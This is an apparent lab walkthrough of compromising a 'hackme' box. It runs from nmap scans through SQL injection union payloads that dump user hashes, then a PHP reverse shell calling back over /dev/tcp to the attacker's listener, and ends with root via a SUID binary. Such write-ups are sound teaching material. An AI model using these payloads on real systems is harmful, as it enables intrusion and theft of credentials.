Initial Foothold
1. Network discovery
nmap -sn 192.168.60.128/24
My target is 192.168.60.129.
2. TCP Portscan
nmap -Pn 192.168.60.129
nmap -Pn -p1000- 192.168.60.129
There are 2 services: SSH (22) and HTTP (80).
3. UDP scan
nmap -sU -sV 192.168.60.129
4. OS and service scan
nmap -A -p22,80 192.168.60.129
5. Vuln scan
nmap --script vuln -p22,80 192.168.60.129
There are HTTP pages that I can access.
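Here's an added example (mine, not part of the original walkthrough) of how I'd chain the scans above instead of retyping the port list by hand: it parses nmap's grepable output (-oG) from the two TCP sweeps and the UDP scan, keeps only ports reported as "open", and builds the -A command for them. The scan output below is constructed to look like what this target returns; it was not captured from the box.

```python
from typing import Dict, List

# Constructed sample of nmap grepable output (-oG -) for the two TCP sweeps and
# the UDP scan above. Not captured from the real target.
SAMPLE_GREPABLE = """\
# Nmap 7.80 scan initiated as: nmap -Pn -oG - 192.168.60.129
Host: 192.168.60.129 ()\tStatus: Up
Host: 192.168.60.129 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (998)
# Nmap 7.80 scan initiated as: nmap -Pn -p1000- -oG - 192.168.60.129
Host: 192.168.60.129 ()\tStatus: Up
Host: 192.168.60.129 ()\tPorts: 8080/closed/tcp//http-proxy///\tIgnored State: filtered (64535)
# Nmap 7.80 scan initiated as: nmap -sU -oG - 192.168.60.129
Host: 192.168.60.129 ()\tPorts: 68/open|filtered/udp//dhcpc///\tIgnored State: closed (999)
"""


def open_ports(grepable: str) -> Dict[str, List[int]]:
    """Collect ports whose state is exactly 'open', per protocol, across every
    Host: line. UDP's usual 'open|filtered' is not treated as open."""
    found = {"tcp": set(), "udp": set()}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue
        # The Ports: field runs up to the next tab (the 'Ignored State' field).
        ports_field = line.split("\tPorts:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            # Each entry is port/state/protocol/owner/service/rpc info/version/
            fields = entry.strip().split("/")
            if len(fields) < 3:
                continue
            port, state, proto = fields[0], fields[1], fields[2]
            if state == "open" and proto in found and port.isdigit():
                found[proto].add(int(port))
    return {proto: sorted(ports) for proto, ports in found.items()}


def followup_scan(target: str, grepable: str) -> List[str]:
    """Build the service/OS scan for the open TCP ports, like 'nmap -A -p22,80 <target>'."""
    tcp = open_ports(grepable)["tcp"]
    if not tcp:
        return []
    return ["nmap", "-A", "-p" + ",".join(str(p) for p in tcp), target]


if __name__ == "__main__":
    print(open_ports(SAMPLE_GREPABLE))
    print(" ".join(followup_scan("192.168.60.129", SAMPLE_GREPABLE)))
```

In practice you'd feed it the real files (nmap ... -oG quick.gnmap, then open_ports(open("quick.gnmap").read())) and hand the command list to subprocess.run.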
Service Enumeration
- SSH
Connect
ssh 192.168.60.129
- HTTP
1. nikto scan
nikto -h http://192.168.60.129
2. Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.129/ -x php,txt,html,sh,cgi -q
3. Access site
The site requires a username and password, and I can also sign up.
View page source
Access /uploads/
Register new user
Log in
There's a search function, and the results table has 3 columns. My guess is that the search function runs a SQL query.
Exploitation
- Test for SQL injection
1' or 1=1--
No data.
Try another test query:
1' or 1=1-- -
Succeeded. The likely reason: in MySQL, "--" only starts a comment when it is followed by whitespace, so if the trailing space of the first payload is stripped before it reaches the query, the closing quote is no longer commented out and the query errors. With "-- -" the required space is inside the payload. Next, continue injecting to retrieve some data.
There are 3 columns, so my guess is that I'll union with 1,2,3. There's no need to step through the column count like this:
1' union select 1-- -
1' union select 1,2-- -
So my query is:
1' union select 1,2,3-- -
As predicted, there’re 3 columns needed for this query.
Retrieve basic information
1' union select @@version,@@hostname,database()-- -
The MySQL version (@@version) is 5.7.25-0ubuntu0.18.10.2.
The hostname (@@hostname) is hackme.
The current database is webapphacking.
Get table name
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
I have 2 tables: books and users.
The users table is interesting. I'll find its columns.
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()-- -
I have 5 columns: id, user, password, name, and address.
I need 3 columns: id, user, and password.
1' union select 1,group_concat(id,':',user,':',password),3 from users-- -
Copy the output and organize it in an editor for easier viewing.
The interesting account is 'superadmin'.
Copy the hash and crack it with CrackStation. Now I have the password.
Login as superadmin.
I can upload files, so I'll try to upload a PHP reverse shell.
Prepare a reverse shell PHP script (192.168.60.128 is my attacking machine):
<?php
// Spawn an interactive bash with stdin and stdout attached to a TCP connection back to 192.168.60.128:443
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.60.128/443 0>&1'");
Prepare the listener
rlwrap nc -lvp 443
Upload the file
Access it via /uploads/ and click the file.
Back on the listener, I now have the connection.
Test it
id
Upgrade to a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Privilege Escalation
- Explore directory
cd /var/www/html
cat config.php
I got the MySQL root credentials.
Try to re-use them via the SSH service.
ssh 192.168.60.129
password: hackme1qaz@WSX
Failed!!!
cd /home/legacy
ls -la
I found this 'touchmenot' file.
Let’s try to run it
./touchmenot
Now I’m root.
The reason running it gives a root shell immediately is the SUID bit: the file is owned by root and has set-user-ID set, so it executes with root's privileges. Normally, you'd check for SUID binaries with this command:
find / -perm -u=s -type f 2>/dev/null
From the result, you can continue the escalation process. This time I was just lucky with the directory enumeration and saved a lot of time finding it.
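Added example (not from the original walkthrough) of the check I'd normally run before getting lucky: walk the filesystem for regular files with the set-user-ID bit, the same match as find / -perm -u=s -type f 2>/dev/null, and diff the hits against an allow-list of SUID binaries you expect on a stock install, so something like /home/legacy/touchmenot stands out. The allow-list and the demo directory tree below are constructed for this example; a real baseline should come from a clean box of the same distro and release.

```python
import os
import stat
import tempfile

# Illustrative allow-list of SUID binaries one expects on a stock install.
# Constructed for this example: build the real list from a clean install of the same release.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}


def is_suid(mode: int) -> bool:
    """Regular file with the set-user-ID bit: exactly what find -perm -u=s -type f matches."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root: str):
    """Every SUID regular file under root, sorted. Unreadable entries are skipped,
    like the 2>/dev/null on the find command."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink itself is never a SUID binary
            except OSError:
                continue
            if is_suid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root: str, baseline=BASELINE):
    """SUID files not on the allow-list: the ones to read or run first."""
    return [p for p in find_suid(root) if p not in baseline]


def make_demo_tree() -> str:
    """Constructed fake filesystem: home/legacy/touchmenot with mode 4755 plus a normal file."""
    root = tempfile.mkdtemp()
    legacy = os.path.join(root, "home", "legacy")
    os.makedirs(legacy)
    suid_bin = os.path.join(legacy, "touchmenot")
    with open(suid_bin, "w") as f:
        f.write("#!/bin/sh\nid\n")
    os.chmod(suid_bin, 0o4755)  # the bit that hands the caller the owner's uid
    with open(os.path.join(legacy, "notes.txt"), "w") as f:
        f.write("nothing interesting\n")
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    for path in unexpected_suid(demo):
        print("unexpected SUID:", path)
```

Against a live box you'd call unexpected_suid("/") and then look each hit up (file, strings, and whether it is a known escalation vector) before running anything.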